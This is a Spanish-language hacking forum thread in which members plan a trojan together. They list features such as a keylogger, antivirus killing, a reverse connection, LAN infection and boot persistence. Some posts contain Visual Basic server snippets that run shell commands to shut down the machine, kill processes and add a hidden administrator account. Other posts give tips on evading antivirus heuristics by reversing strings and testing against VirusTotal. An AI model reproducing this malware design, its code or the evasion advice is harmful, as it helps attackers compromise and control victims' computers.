Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - ſeptiembre 06, 2008, 09:03:47
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-, Angelus_7722)  |  Tema: Creemos un Troyano! 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 ... 21 Ir Abajo Imprimir
Autor Tema: Creemos un Troyano!  (Leído 11215 veces)
SkullMaster123
Visitante
« en: Octubre 25, 2007, 12:46:00 »

Hola bueno estaba pensando en cosas de troyano y eso y no se porque se me bino a la mente que entre TODOS los de la comunidad hacer un troyano, claro Muchas personas diran ¿Y para que Demonios kiero hacer un troyano si puedo bajar un Sub-7, o el Poison? contesto: Pues no se si ustedes han sentido esa sensacion de cuando uno crea algun programa en este caso un troyano y sirve uno siente esa sensacion de que lo hiso uno solo, que uno lo hiso sin ayuda, y sobre todo no lo descargo y obtubo mas conocimiento Wink bueno eso es, porque lo hacemos no uno solo si no TODOS los de la comunidad Underground Hispana Grin y ademas asi ir fomentando nuestro conocimiento sobre creacion de troyanos etc..... Asi que bueno sin mas nada que decir los que se kieran apuntar para hacer el troyano posteen sus ideas y no importa Si eres el tipo mas inteligente en Troyanos o si no sabes nada solo un poco, ¡NO IMPORTA! creelo o no tu aporte cuenta, porque todos somos ignorantes pero no todos ignoramos los mismo!! luego que sea termiando el troyano sera subido a rapidShare o a lo que sea para que todos los descarguemos!!;) bueno jeje me inspire!! Grin estas son mis ideas para el troyano:

Que apage la PC
Que reinicie la PC
Cierre messenger
Deje Payload(Opcional)
Key-Logger(Opcional)
Envie mensajes a la makina que ejecuto el server, y envie mensajes por LAN
Cree nueva Sesion
Abrir Paginas web
Matar Anti-Virus

Bueno esas son mis ideas! Vamos Comunidad Underground Apuntense en este proyecto!

Saludos Y espero Sus Ideas!!:D

P.D: Como dije no importa si eres el MEJOR en troyano O solo sabes un poco Tu Opinion Cuentaa!!:D 
enoc
Miembro
Desconectado Desconectado

Ver Perfil
« Respuesta #1 en: Octubre 25, 2007, 03:30:11 »

Hola yo te propongo que :
- Este totalmente en español
- Tenga Capturador de Audio
- Que se pueda elegir que calidad quieres en la captura de pantalla(para una descarga mas rapida, segun tu conexion)
- Pueda infectar toda una LAN
- Sea  de conexion Inversa
- Keylogger

Saludos  Grin

SkullMaster123
Visitante
« Respuesta #2 en: Octubre 25, 2007, 04:38:33 »

Bueno Muy bueno tu aporte enoc, demos un poco mas de tiempo 1 o maximo 2 dias mas para que la gente se apunte al proyecto, Señores den sus ideas, para asi crear entre todos un troyano, el primero(Creo) hecho 100% por los de la comunidad underground! Wink

Saludos y sigan dando sus opiniones!!;)
[p3ll3]
Colaborador

... Open your eyes , open your mind ...

Ver Perfil WWW
« Respuesta #3 en: Octubre 25, 2007, 04:46:15 »

Esta buena la idea, yo tambien  estaba pensando hacerme un troyano (para uso personal  Evil ), primero que todo hay que definir el lenguaje de programacion, para hacerlo  con todas esas funciones no es solo de poner por poner , cada una toma su tiempo a la hora de programar, pero bueno ...

Las ideas mias son las siguientes:

Que apage la PC
Que reinicie la PC
  --> Son casi las mismas

Cierre messenger
Matar Anti-Virus
--> Son solo matar procesos

Deje Payload(Opcional) --> Deberia tenerlo como fundamental  --> De acuerdo
Key-Logger(Opcional)  --> Deberia tenerlo como fundamental   --> De acuerdo

Cree nueva Sesion --> Deberia tenerlo como fundamental

Envie mensajes a la makina que ejecuto el server, y envie mensajes por LAN --> Mejor no
Abrir Paginas web --> Mejor no

- Este totalmente en español --> El codigo o la interfaz Huh (creo que no deberia preguntar eso  Grin)
- Tenga Capturador de Audio --> De acuerdo
- Que se pueda elegir que calidad quieres en la captura de pantalla --> De acuerdo
- Pueda infectar toda una LAN --> De acuerdo
- Sea  de conexion Inversa  --> Mas bien que uno pueda elegir el tipo de conexion.
- Keylogger --> De acuerdo

Yo me apunto , aunque este tema ya es bastante "quemado", espero que los que nos apuntemos sepamos algo por lo menos de programacion o batch para que no se quede solo en palabras.

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

SkullMaster123
Visitante
« Respuesta #4 en: Octubre 26, 2007, 06:34:06 »

Bueno p3ll3 estan muy buenas tu ideas y Gracias por apuntarte!!:) Smiley
y otra cosa sobre lo de programacion bueno yo se aunque aun me faltan ciertas cositas o mejor dichos tips que aprender:) y Batch si se mucho ya que con eso aprendi yo!!;), y Erick Tu te kieres apuntar para hacer este proyecto??, y para los que no han opinado Vamos Animensee a hacer este proyecto que es de todoss!!!!!!!!! Smiley Smiley Smiley, y tengo otra idea aunque no se si les guste mucho!:S es sobre Mandar con el troyano mensajes por el messenger osea que si el sujeto esta conectado le mande mensajes a sus contactos los que nosotros pongamos en el Cliente Aunque no c que opninan ustedes?? Huh

Bueno Saludos Y Animos Gente apuntenc a este proyecto que es de todos!!!!!:)

P.D:Sobre lo del lenguaje lo hacemos en VB y usamos Opciones de Batch que creo q es fundamental!! Grin y Animense gentee!! (Daremos que se yo 1 dia mas dependiendo de cuanta gente se apunte hoy27/10/07!)
kj
Colaborador

el que madruga dios lo arruga

jjk_192@hotmail.com
Ver Perfil Email
« Respuesta #5 en: Octubre 26, 2007, 11:36:53 »

yo quisiera que el proyecto de erick se termine, pero ya es caso perdido.

este post creo que comenzó bien porque SkullMaster123 y enoc ya pusieron los objetivos, para que en realidad esto comienze se debe tener una base del toyano yo propongo que utilicemos el troyano que expone SkullMaster123 aqui:

y luego le vayan aunmentando cosas para llegar a los objetivos.

para evitar que pase lo que paso en el post de erick propongo que no se den mensajes como:

"yo me apunto" y que la forma de apuntarse sea dando un aporte.

SkullMaster123 te apoyo.

saludos

kj

*si la vida te da la espalda agarrale el culo.
*la cerveza mata lentamente, pero no tengo apuro  alguno.
*daria todo lo que se por la mitad de lo que ignoro.

acabemos con rapidshare y megaupload      :: clic aqui ::

no mas lista negra para kaspersky - recupera y utiliza keys en lista negra   :: clic aqui ::
SkullMaster123
Visitante
« Respuesta #6 en: Octubre 26, 2007, 12:10:06 »

Bueno espero que no pase lo que le paso a los otros que no se animo la gente, de verdad vamos a hecharle pichon!!!! Smiley Smiley no nos desanimemos y como dijo kj los que se kieran apuntar, que dugan de una vez que se van a apuntar y pongan sus ideas!! Wink (Todas Cuentas aki no vamos a excluir a nadie, por eso se llama comunidad porq no excluimos a nadie!!;)) y bueno hasta las momentos los que se han apuntado hasta ahora son:

...::Apuntados::...

- P3ll3
- Kj
- enoc
- Yo, obviamente
y estoy esperando la respuesta de -Erick- q espero que nos ayude Wink....

Bueno esos son los que se apuntaron hasta ahora, Vamos gente de la comunidad apuntense no sean Agua Fiestas!!XDXD brindis !!!

Saludos y sigan apuntandose mientras mas mejor!
[p3ll3]
Colaborador

... Open your eyes , open your mind ...

Ver Perfil WWW
« Respuesta #7 en: Octubre 26, 2007, 12:37:49 »

Yo ya llevo hecho la interfaz del cliente y creadora del server...

Me ha costado porque no se consigue igual informacion para visual 2005 que para el 6.0 entonces ahi estoy luchando,
ademas yo tampoco soy como muy avanzado programando.
Estoy tratando de aprender las funciones de troyanos , como el NuclearRat,el Bifrost,CoolVibes... al final si nadie hace nada yo voy a tratar de terminar el troyano por mi cuenta .
Espero que se puede hacer algo al final de cuentas.

Saludos............................ Cool

SkullMaster123
Visitante
« Respuesta #8 en: Octubre 26, 2007, 01:27:34 »

Saludos bueno p3ll3 esta bien que ya hallas hecho eso, pero esperate un dia mas para asi hacerlos entre todos los que estan Apuntados para no perdernoss ya que no te podemos hechar el muerto solo a ti;) Yo tambien kiero hacer algo!XD y creo q todos los demas tambien kieren aporta algoo! Wink jeje bueno y para todos los demas apuntence al proyecto.....No sean flojos y digan hay mejor descargar el Sub7, no señores no es los mismoo como aclare antes ademas este troyano va a ser de todoss los de la comunidad, Vamos Adelante!!! Wink Wink Wink

Saludos!!

P.D:Como dije esperemos 1 dia mas para ver kienes mas se apuntan, Saludos y por cierot P3ll3 si tienes alguna duda por lo menos postea a ver en q te podemos ayudar!!!! Saludoss Grin Wink
¦nfêrnu§
Habitual

Linux User Forever

Ver Perfil
« Respuesta #9 en: Octubre 26, 2007, 11:58:45 »

Yo colaboraría, pero no tengo ni idea de programación la verdad. Pero solo por proponer, propongo cosas básicas como:

- Capturador de WebCam
- File manager
- Process manager
- Una shell remota
- Editor del registro
- Visor de las ventanas activas

Y no se si podría decir algo más... son cosas básicas pero ya que nadie las a dicho (o eso creo) pues las digo yo...

Es en lo único que puedo ayudar, de programar no se absolutamente nada así que eso ya... lo siento mucho.

Saludos__ _!
dark confundido
Habitual

Maestro Troyano

Ver Perfil WWW
« Respuesta #10 en: Octubre 27, 2007, 01:55:48 »

lo unico ke les recomiendo es ke n hagan ke se propague el mismo por MSN y por USB despues no sabran ke hacer con tanta victima XD

kj
Colaborador

el que madruga dios lo arruga

jjk_192@hotmail.com
Ver Perfil Email
« Respuesta #11 en: Octubre 27, 2007, 05:14:24 »

apoyo a la idea de dark confundido. Grin

kj

*si la vida te da la espalda agarrale el culo.
*la cerveza mata lentamente, pero no tengo apuro  alguno.
*daria todo lo que se por la mitad de lo que ignoro.

acabemos con rapidshare y megaupload      :: clic aqui ::

no mas lista negra para kaspersky - recupera y utiliza keys en lista negra   :: clic aqui ::
SkullMaster123
Visitante
« Respuesta #12 en: Octubre 27, 2007, 05:27:59 »

Hola bueno Gente hoy comienza la creacion del troyanoo!!!!!!! Grin Grin jeje bueno las personas q no se an apuntado y se kieran apuntar al proyecto den ideas y que por lo menos tengan algo de esa idea!!! Wink y para los apuntados ya comenzemos amigos animosss!!!!!! Grin Grin, por cierto keria decirles algo pasamos todo el codigo para el foro y al final decidimos kien va a acomodarlo?? y si es asi, especifiquen en el codigo para que boton a, o donde se tiene que colocar el codigo!, gente vamos no se desanimenn hechemos esta idea para adelante vamos que esto es de todoss!!! Wink ;)bueno antes de que se me olvide estan son las ideas que van hasta ahora!!:

Ideas:

- Deje Payload
- Apaga PC
- Keylogger
- cree una nueva sesion
- captura de pantalla
- Infectar LAN
- Sea  de conexion Inversa(esta Opcion vamos a ver como la podemso acr para ver si podemos acr que la conexion, sea inversa o normal esto lo tratamos mas tarde!:P)
- Que se ejecute cada ves que se prenda la makina
- Mate Antivirus
-Cierre MSN

Bueno esas son las opciones que van hasta ahora, miren las opciones que nos recomendo "The ghost system" haber si les gusta alguna y si les gusta agregenla, bueno gente vamos para adenlante no nos desanimemos!!!!!! Wink

P.D:Gente yo comenzare a hacer codigo como a las 9 maximo 10 de la noche ya que tengo que ir a una reunion Familiarr Lips Sealed y no puedo trabajar pero les garantizo que les dejare code, ha y P3ll3 dinos que llevas hasta ahora para no postearloxDxD!!

Buueno saludoss!!y Vamos Gente a Animarnoss!!!!! Wink
SkullMaster123
Visitante
« Respuesta #13 en: Octubre 27, 2007, 05:44:51 »

Hola bueno voy a poner un pokito del code lo mas facil y corto del code en parte no pongo mas ya que llegue a las 12 de la noche a mi ksa y estoy matado!XD jeje bueno y tambien lo pongo para asi salir de lo sencillo del code!!

Creamos:
2 CommandBoton

1- Apagar en este va:

Winsock1.SendData "apa"

2- Cerrar MSN en este va:
Winsock1.SendData "cerra"

Ya se q eso lo hase hasta mi mama pero esperen q ya pongo un poco mas! Wink

Saludos y espero sus aporteess!!!
dark confundido
Habitual

Maestro Troyano

Ver Perfil WWW
« Respuesta #14 en: Octubre 27, 2007, 06:49:58 »

El server va a ir constituido por Un textBox
y en el textBox agregamos esto:

Private Sub Text1_Change()
If Text1.text = "apa" Then
Shell ("cmd.exe /c shutdown -s -t 1
End if
if Text1.text = "cerra" Then
Shell ("cmd.exe /c Taskkill msnmsgr.exe")
End if
If text1.text = "sesi" Then
Shell ("cmd.exe /c net user virii "vbcoder" /add /expires:never&net localgroup "administradores" /add")
End if
If Text1.text = "cone" Then
Shell ("cmd.exe /c ipconfig /release")
End if
End Sub

lo ke puse en rojo hay ke encriptarlo por ke la HEURISTICA dice si una cadena termina en .exe es un VIRUS  Roll Eyes

hagan pruebas y envienlas a VIRUSTOTAL y se daran cuenta XD
podrian encriptarla de formas bien dificiles pero hay maneras bien sencillas como esta

tambien recuerden nunca poner estas cadenas:

SYSTEM
SYSTEM32
WINDOWS

y muchas otras detectadas por la HEURISTICA de los peores antivirus el NOD32, KASPERSKY y otros no les prestan atencion a esas cosas ellos van a lo ke van,
eso me recuerda una anecdota hace años (como 7) usaba el PANDA y me detectaba un programa como posible amenaza y ese programa era tachan el DONWLOAD ACCELERATOR XD

XD

« Última modificación: Octubre 27, 2007, 06:50:57 por dark confundido » En línea

SkullMaster123
Visitante
« Respuesta #15 en: Octubre 27, 2007, 07:05:21 »

Saludos Dark confundido y gracias por tu aporte! Wink jeje bueno no sabia lo de encriptar y bueno mira:

El primer error
Shell ("cmd.exe /c shutdown -s -t 1
Lo mas probable es q se me halla pasado por sueño!xD
jeje y el segundo
Shell ("cmd.exe /c Taskkill msnmsgr.exe")
No me preguntes porq pero a mi si me sirve y lo probe con la computadora de abajo y tambien sirve:S yo tngo Windows XP
y el tercero:
Shell ("cmd.exe /c net user virii "vbcoder" /add /expires:never&net localgroup "administradores" /add")
me di cuenta ac rato probandolo porq dudaba q se ejecutarxD y mis dudas tenia razon jeje pero me voy a meter en la info q pusistes!!!! Grin

Saludos!!!!!!

P.D:Vamos Sigan opinando no dejen morir el proyecto!!!! Wink Grin
-Erick-
Moderadores
Gran Colaborador

Ver Perfil WWW Email
« Respuesta #16 en: Octubre 28, 2007, 01:33:18 »

Uff,que has hecho  Grin
Porque guardas los datos en el textbox?Y no en una variable.Echale un ojo al manual de la e-zine.
Y sobre matar procesos,no uses batch...y para lo demás tampoco,corres el riesgo de que no funcione en todos los pc's o que haya problemas.
Para encriptar las cadenas usa la funcion StrReverse(),que es como te dijo dark.
Saludos.

-Erick-
Moderadores
Gran Colaborador

Ver Perfil WWW Email
« Respuesta #17 en: Octubre 28, 2007, 03:42:56 »

Aqui tienes el manual,lo pasaron al foro:

NorK
Moderación
Habitual

Respeto al sabio por sabiduria o por torpeza.

Ver Perfil
« Respuesta #18 en: Octubre 28, 2007, 04:06:49 »

vale, es que no lo había visto  Tongue

-Erick-
Moderadores
Gran Colaborador

Ver Perfil WWW Email
« Respuesta #19 en: Octubre 28, 2007, 04:14:43 »

vale, es que no lo había visto  Tongue
Yo no me acordaba que lo habian pasado al foro.
Pues eso,ya tienes 2 ejemplos,el de NorK y el mio,ya tienes por donde empezar   Wink

SkullMaster123
Visitante
« Respuesta #20 en: Octubre 28, 2007, 04:47:37 »

Saludos!,bueno vamos para adelante con el troyano gente!!XD Grin jeje bueno gracias por su ayuda Nork y -Erick- de verdad la valoro, aohra ya me lei la E-Zine y ahora keria preguntarles algo:

Me puse a  ver entre conexion Directa y Conexion Inversa y de verdad nose que decir asi que que me dicen Cheesy

- Conexion Directa(Me parece mas sencillo el unico problem la IP)
- Conexion Inversa(Me parece un pokito mas complicado pero es mas Fiable)
- Opcional(OJO:No se si c pueda pero y si c pudiera acr con las dos conexions?)

Bueno diganme que prefieren, y -Erick- Que me recomiendas tu que no usa nada de Batch en este troyano, o que no lo use tanto?

Saludos y Espero sus Respuestas!!!!Y para Adelante con el troyano no se desanimenn!!! Cheesy Cheesy Cheesy

P.D:Gracias por sus tutos e informacion Wink ............
NorK
Moderación
Habitual

Ver Perfil
« Respuesta #21 en: Octubre 28, 2007, 05:09:27 »

La conexión directa en los troyanos esta desfasada... te explico:

La conexión directa como bien dices necesitas la ip de la victima, pero es que aun así no te podrías conectar porque los routers, firewall.... bloquean las conexiones entrantes no permitidas... entonces por mucho que intentes conectar no te servirá de nada.

Por lo que se tendría que utilizar la conexión inversa, y esto significa que la victima se conecta a nosotros y así el firewall, router... lo tome como una conexión de dentro a fuera por lo que esta permitida.

Espero que te aya aclarado algo  Grin

SkullMaster123
Visitante
« Respuesta #22 en: Octubre 28, 2007, 05:17:45 »

gracias nork Smiley si me lo aclarastes eso entonces se hara inversa y otra cosa osea respecto al tema los firewalls cuando ejecutas el server te dicen (no me acuerdo bien de lo que dicen pero te dan unas opciones que son -Mantener Bloqueado, -Desbloquear y eso vvd), por cierto con lo que dijo erick, usamos si o no Batch en el Troyano, tu que dices??? Huh

Saludos y Muchisimas Gracias!!

P.D:Vamos gente apuntece a  este proyecto que vamos BIENN!!!!!! Grin Wink
SkullMaster123
Visitante
« Respuesta #23 en: Octubre 28, 2007, 12:41:54 »

hey q pasoo??? Huh Posteen codigo gentee no se desanimenn a penas salga de los estudios empesare a poner Codigo del troyano vamos q en esto no estan soloossss!!! Wink

Y Lod Expertus se mete = q cono conexion directa se lo envias y ya Cheesy

y vamos gente q pasa vamos!!
NorK
Moderación
Habitual

Ver Perfil
« Respuesta #24 en: Octubre 29, 2007, 03:34:32 »

gracias nork Smiley si me lo aclarastes eso entonces se hara inversa y otra cosa osea respecto al tema los firewalls cuando ejecutas el server te dicen (no me acuerdo bien de lo que dicen pero te dan unas opciones que son -Mantener Bloqueado, -Desbloquear y eso vvd), por cierto con lo que dijo erick, usamos si o no Batch en el Troyano, tu que dices??? Huh

Saludos y Muchisimas Gracias!!

P.D:Vamos gente apuntece a  este proyecto que vamos BIENN!!!!!! Grin Wink

Si quieres introducir Batch adelante... mientras que cumpla las expectativas de troyano  Grin

Páginas: [1] 2 3 4 5 6 7 8 9 10 11 ... 21 Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-, Angelus_7722)  |  Tema: Creemos un Troyano! « anterior próximo »
Ir a:  

Ranking-Hits